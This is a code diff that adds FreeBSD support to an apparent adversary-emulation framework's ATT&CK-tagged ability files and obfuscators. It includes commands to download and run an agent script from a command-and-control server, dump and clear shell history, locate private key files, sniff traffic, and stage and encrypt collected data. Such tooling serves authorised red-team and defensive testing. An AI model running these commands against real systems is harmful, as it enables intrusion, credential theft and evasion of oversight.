Add support for FreeBSD

app/obfuscators/base64_basic.py

@@ -10,6 +10,7 @@ def supported_platforms(self):
         return dict(
             windows=['psh'],
             darwin=['sh'],
+            freebsd=['sh'],
             linux=['sh']
         )
 

app/obfuscators/base64_jumble.py

@@ -14,6 +14,7 @@ def supported_platforms(self):
         return dict(
             windows=['psh'],
             darwin=['sh'],
+            freebsd=['sh'],
             linux=['sh']
         )
 

app/obfuscators/base64_no_padding.py

@@ -8,6 +8,7 @@ def supported_platforms(self):
         return dict(
             windows=['psh'],
             darwin=['sh'],
+            freebsd=['sh'],
             linux=['sh']
         )
 

app/obfuscators/caesar_cipher.py

@@ -10,6 +10,7 @@ def supported_platforms(self):
         return dict(
             windows=['psh'],
             darwin=['sh'],
+            freebsd=['sh'],
             linux=['sh']
         )
 

app/obfuscators/steganography.py

@@ -14,6 +14,7 @@ class Obfuscation(BaseObfuscator):
     def supported_platforms(self):
         return dict(
             darwin=['sh'],
+            freebsd=['sh'],
             linux=['sh']
         )
 

data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml

@@ -15,7 +15,7 @@
         parsers:
           plugins.stockpile.app.parsers.ssh:
             - source: remote.ssh.cmd
-    linux:
+    freebsd,linux:
       sh:
         command: |
           pip install -q stormssh 2> /dev/null && storm list | sed 's/\x1b\[[0-9;]*m//g'

data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml

@@ -33,7 +33,7 @@
         parsers:
           plugins.stockpile.app.parsers.basic:
             - source: host.dir.staged
-    linux:
+    freebsd,linux:
       sh:
         command: |
           chmod +x ./file_search.sh; ./file_search.sh --extensions '#{linux.included.extensions}'

data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml

@@ -8,7 +8,7 @@
     attack_id: T1560.001
     name: "Archive Collected Data: Archive via Utility"
   platforms:
-    linux:
+    freebsd,linux:
       sh:
         command: |
           tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg
@@ -29,4 +29,4 @@
             - source: host.dir.compress
   requirements:
     - plugins.stockpile.app.requirements.paw_provenance:
-      - source: host.dir.staged
+      - source: host.dir.staged

data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml

@@ -12,7 +12,7 @@
       sh:
         command: |
           cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}
-    linux:
+    freebsd,linux:
       sh:
         command: |
           cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]}

data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml

@@ -17,7 +17,7 @@
         parsers:
           plugins.stockpile.app.parsers.basic:
             - source: host.dir.staged
-    linux:
+    freebsd,linux:
       sh:
         command: |
           mkdir -p staged && echo $PWD/staged

data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml

@@ -6,7 +6,7 @@
     attack_id: T1005
     name: Data from Local System
   platforms:
-    linux:
+    freebsd,linux:
       sh:
         command: |
           for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do
@@ -21,4 +21,4 @@
           Get-ChildItem C:\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter ".git" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;
         parsers:
           plugins.stockpile.app.parsers.basic:
-            - source: host.dir.git
+            - source: host.dir.git

data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml

@@ -12,7 +12,7 @@
       sh:
         command: |
           curl #{remote.host.socket}
-    linux:
+    freebsd,linux:
       sh:
         command: |
           curl #{remote.host.socket}

data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml

@@ -27,7 +27,7 @@
             - source: host.file.path
               edge: has_extension
               target: file.sensitive.extension
-    linux:
+    freebsd,linux:
       sh:
         command: |
           find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\.*' -size -500k 2>/dev/null | head -5

data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml

@@ -16,7 +16,7 @@
       psh,pwsh:
         command: |
           Get-Clipboard -raw
-    linux:
+    freebsd,linux:
       sh:
         command: |
           xclip -o

data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml

@@ -15,6 +15,15 @@
           python ragdoll.py -W $server#{app.contact.html}
         cleanup: |
           pkill -f ragdoll
+    freebsd:
+      sh:
+        command: |
+          server="#{app.contact.http}";
+          curl -s -X POST -H "file:ragdoll.py" -H "platform:freebsd" $server/file/download > ragdoll.py;
+          pip install requests beautifulsoup4;
+          python3.9 ragdoll.py -W $server#{app.contact.html}
+        cleanup: |
+          pkill -f ragdoll
     linux:
       sh:
         command: |

data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml

@@ -33,3 +33,8 @@
       sh:
         command: |
           tcpdump -i en0 & sleep 5; kill $!
+    freebsd:
+      sh:
+        command: |
+          tcpdump -i em0 & sleep 5; kill $!
+

data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml

@@ -2,7 +2,7 @@
 
 - id: 422526ec-27e9-429a-995b-c686a29561a4
   name: Dump history
-  description: Get contents of bash history
+  description: Get contents of bash/csh history
   tactic: credential-access
   technique:
     attack_id: T1552.003
@@ -14,6 +14,12 @@
         parsers:
           plugins.stockpile.app.parsers.ssh:
             - source: remote.ssh.cmd
+    freebsd:
+      sh:
+        command: cat ~/.history
+        parsers:
+          plugins.stockpile.app.parsers.ssh:
+              - source: remote.ssh.cmd
     linux:
       sh:
         command: cat ~/.bash_history

data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml

@@ -19,7 +19,7 @@
       sh:
         command: |
           for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name "*${i}" 2>/dev/null;done;
-    linux:
+    freebsd,linux:
       sh:
         command: |
-          for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done;
+          for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done;

data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml

@@ -11,7 +11,7 @@
     darwin:
       sh:
         command: sleep 60
-    linux:
+    freebsd,linux:
       sh:
         command: sleep 60
     windows:

data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml

@@ -12,10 +12,14 @@
       sh:
         command: |
           > $HOME/.bash_history && unset HISTFILE
+    freebsd:
+      sh:
+        command: |
+          > $HOME/.history && set history = 0
     linux:
       sh:
         command: |
           > $HOME/.bash_history && unset HISTFILE
     windows:
       psh:
-        command: Clear-History;Clear
+        command: Clear-History;Clear

data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml

@@ -12,11 +12,11 @@
       sh:
         cleanup: |
           rm #{payload}
-    linux:
+    freebsd,linux:
       sh:
         cleanup: |
           rm #{payload}
     windows:
       psh,pwsh:
         cleanup: |
-          Remove-Item -Force -Path "#{payload}"
+          Remove-Item -Force -Path "#{payload}"

data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml

@@ -25,9 +25,9 @@
           path="$(pwd)/#{exe_name}";
           num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l);
           if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi;
-    linux:
+    freebsd,linux:
       sh:
         command: |
           path="$(pwd)/#{exe_name}";
           num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l);
-          if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi;
+          if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi;

data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml

@@ -12,7 +12,7 @@
       sh:
         command: |
           find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \;
-    linux:
+    freebsd,linux:
       sh:
         command: |
           find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \;

data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml

@@ -12,7 +12,7 @@
       sh:
         command: |
           ps
-    linux:
+    freebsd,linux:
       sh:
         command: |
           ps

data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml

@@ -12,7 +12,7 @@
       sh:
         command: |
           nmap -sV -p #{remote.host.port} #{remote.host.ip}
-    linux:
+    freebsd,linux:
       sh:
         command: |
           nmap -sV -p #{remote.host.port} #{remote.host.ip}

data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml

@@ -12,7 +12,7 @@
       sh:
         command: |
           ps aux | grep #{host.user.name}
-    linux:
+    freebsd,linux:
       sh:
         command: |
           ps aux | grep #{host.user.name}

data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml

@@ -17,6 +17,17 @@
             target: remote.host.port
         payloads:
         - scanner.py
+    freebsd:
+      sh:
+        command: |
+          python3.9 scanner.py -i #{remote.host.ip}
+        parsers:
+          plugins.stockpile.app.parsers.scan:
+          - source: remote.host.ip
+            edge: has_open_port
+            target: remote.host.port
+        payloads:
+        - scanner.py
     linux:
       sh:
         command: |

data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml

@@ -12,7 +12,7 @@
       sh:
         command: |
           ls
-    linux:
+    freebsd,linux:
       sh:
         command: |
           ls

data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml

@@ -42,6 +42,6 @@
     darwin:
       sh:
         command: ps aux
-    linux:
+    freebsd,linux:
       sh:
-        command: ps aux
+        command: ps aux

data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml

@@ -15,6 +15,6 @@
     darwin:
       sh:
         command: groups
-    linux:
+    freebsd,linux:
       sh:
-        command: groups
+        command: groups

data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml

@@ -12,7 +12,7 @@
       sh:
         command: |
           cat ~/.ssh/known_hosts
-    linux:
+    freebsd,linux:
       sh:
         command: |
           cat ~/.ssh/known_hosts

data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml

@@ -11,6 +11,10 @@
       sh:
         command: |
           netstat -anto
+    freebsd:
+      sh:
+        command: |
+          netstat -aSp tcp
     linux:
       sh:
         command: |

data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml

@@ -14,7 +14,7 @@
           - source: host.print.file
             edge: has_size
             target: host.print.size
-    linux:
+    freebsd,linux:
       sh:
         command: lpq -a
         parsers:

data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml

@@ -12,7 +12,7 @@
       sh:
         command: |
           pwd
-    linux:
+    freebsd,linux:
       sh:
         command: |
           pwd

data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml

@@ -12,6 +12,10 @@
       sh:
         command: |
           which google-chrome
+    freebsd:
+      sh:
+        command: |
+          which chrome
     linux:
       sh:
         command: |

data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml

@@ -14,7 +14,7 @@
         parsers:
           plugins.stockpile.app.parsers.ipaddr:
             - source: remote.host.ip
-    linux:
+    freebsd,linux:
       sh:
         command: arp -a
         parsers:
@@ -25,4 +25,4 @@
         command: arp -a
         parsers:
           plugins.stockpile.app.parsers.ipaddr:
-            - source: remote.host.ip
+            - source: remote.host.ip